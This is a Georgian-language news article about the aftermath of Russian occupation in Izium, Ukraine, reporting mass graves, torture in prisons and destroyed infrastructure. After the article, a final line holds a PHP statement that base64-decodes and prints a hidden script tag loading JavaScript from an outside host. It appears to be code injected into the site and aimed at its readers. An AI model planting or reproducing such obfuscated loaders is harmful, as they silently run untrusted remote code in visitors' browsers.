celsiusi
ავერსი შნაიდერი
ხარკოვის ოლქის ქალაქ იზიუმის გათავისუფლების შემდეგ, ცნობილი გახდა რუსი ოკუპანტების სისასტიკის ახალი ფაქტები.
 
იზიუმის მერის მოადგილემ, ვოლოდიმირ მაცოკინმა, ტელეარხ FREEDOM-ის ეთერში ოკუპანტების დანაშაულებზე ისაუბრა. ის მსხვერპლის ზუსტ რაოდენობას ვერ ასახელებს:
 
„მსხვერპლის რაოდენობას ვერ დავასახელებ. შეიძლება იყოს ათასზე მეტი ან ნაკლები, მაგრამ გეტყვით, რომ ძალიან შემაშფოთებელი ინფორმაცია მოდის იზიუმიდან იმის შესახებ, რომ ჩვენ უკვე აღმოვაჩინეთ მასობრივი საფლავები. აღმოჩენილია მოკლული ადამიანების ცხედრები... ჩვენ უკვე ვიცით ამ ადამიანების სახელები, უკვე ვიცით გარემოებები... ვიცით ციხეების შესახებ, ვიცით იქიდან ისტორიები, როგორ გაიქცნენ ადამიანები შეიარაღებული ძალების შემოსვლისას.. ჩვენ ვიცით, რომ ამ ციხეებში ქალებს აწამებდნენ ელექტროშოკით, ამცირებდნენ“, - თქვა მან.
 
მისივე თქმით, იზიუმში ამჟამად მძიმე ჰუმანიტარული ვითარებაა.  ქალაქის ინფრასტრუქტურის 75%-ზე მეტი განადგურებულია. არ არის წყალი, ელექტროენერგია, გაზი, ხოლო ქუჩები დანაღმულია.
 
მერის მოადგილე ხალხს სიფრთხილისკენ მოუწოდებს.
 
შეგახსენებთ,  უკრაინის შეიარაღებულმა ძალებმა გასულ კვირას გაათავისუფლეს და კონტროლი აღადგინეს ხარკოვის რეგიონის დასახლებებზე. დეოკუპირებულ ტერიტორიაზე უკრაინელებმა წამების ოთახები და მშვიდობიანი მოქალაქეების ნაწამების ცხედრები აღმოაჩინეს.
 
იმ ადგილებზე, რომლებიც რუსებს ჰქონდათ ოკუპირებული, ახლა უკრაინელი სამართალდამცველები მუშაობენ და ომის დანაშაულების მტკიცებულებებს აგროვებენ.
398
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");